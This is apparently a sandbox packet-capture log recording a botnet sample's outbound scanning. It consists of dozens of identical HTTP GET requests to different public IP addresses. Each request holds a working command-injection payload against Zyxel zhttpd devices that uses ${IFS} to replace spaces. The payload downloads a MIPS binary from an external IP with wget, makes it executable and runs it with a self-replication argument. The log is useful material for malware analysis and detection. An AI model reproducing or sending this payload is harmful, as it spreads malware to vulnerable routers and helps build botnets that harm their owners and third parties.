                                      Jan 14, 2024 15:50:53.463896036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6096192.168.2.145457017.150.184.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463922024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6097192.168.2.1445762185.171.22.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.463965893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6098192.168.2.143342034.112.0.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464008093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6099192.168.2.145140688.19.250.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464010000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6100192.168.2.146007888.56.24.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464026928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6101192.168.2.1460850134.48.174.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464060068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6102192.168.2.144013079.42.23.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464102983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6103192.168.2.144253475.196.29.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464118958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6104192.168.2.145504659.219.124.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464193106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6105192.168.2.1454862178.205.152.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464219093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6106192.168.2.1437622139.119.252.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464258909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6107192.168.2.143380278.241.163.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464307070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6108192.168.2.14598142.49.186.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464349985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6109192.168.2.143427424.237.251.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464390993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6110192.168.2.1434968192.48.227.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464428902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6111192.168.2.1449466103.40.159.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464473963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6112192.168.2.1450518135.3.54.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464520931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6113192.168.2.143756663.0.194.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464538097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6114192.168.2.143842497.34.212.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464596033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6115192.168.2.144943234.149.159.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464628935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6116192.168.2.143394613.191.146.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464648008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6117192.168.2.1440994222.54.61.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464689016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6118192.168.2.1448078182.77.97.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464737892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6119192.168.2.1442330192.136.217.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464771032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6120192.168.2.1444072169.49.227.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464809895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6121192.168.2.1443640108.153.166.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464828968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6122192.168.2.1444232211.191.81.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464888096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6123192.168.2.143991684.228.149.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464941025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6124192.168.2.145777262.207.214.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.464996099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6125192.168.2.1435406114.197.118.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465018988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6126192.168.2.145421874.31.94.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465043068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6127192.168.2.1460820152.148.56.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465076923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6128192.168.2.1442182185.96.153.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465137959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6129192.168.2.1459006163.183.203.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465153933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6130192.168.2.1451220176.139.87.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465195894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6131192.168.2.145373674.186.159.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465233088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6132192.168.2.1446330205.210.160.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465265989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6133192.168.2.145223812.142.199.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465316057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6134192.168.2.145681086.26.26.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465348005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6135192.168.2.145421292.113.184.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465373993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6136192.168.2.143600490.93.101.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465423107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6137192.168.2.1455762126.164.129.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465450048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6138192.168.2.1460412204.218.107.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465475082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6139192.168.2.14506001.53.2.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465508938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6140192.168.2.145858042.189.13.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465552092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6141192.168.2.1451788145.189.35.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465589046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6142192.168.2.1458640102.202.57.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465651989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6143192.168.2.145710669.27.226.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465687037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6144192.168.2.1440588159.54.152.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465735912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6145192.168.2.1442408190.90.172.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465751886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6146192.168.2.144092687.30.86.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465785027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6147192.168.2.144361076.47.152.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465831041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6148192.168.2.1454434174.35.63.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465864897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6149192.168.2.1455674104.82.238.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465915918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6150192.168.2.1444962158.130.135.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465945005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6151192.168.2.145210440.123.2.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.465998888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6152192.168.2.1453160185.251.37.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466029882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6153192.168.2.143936486.250.135.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466067076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6154192.168.2.14382244.96.221.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466141939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6155192.168.2.1441836183.159.169.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466162920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6156192.168.2.1442894166.248.254.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466185093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6157192.168.2.1440316143.35.142.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.466224909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6158192.168.2.144645444.76.51.153443
                                      TimestampBytes transferredDirectionData
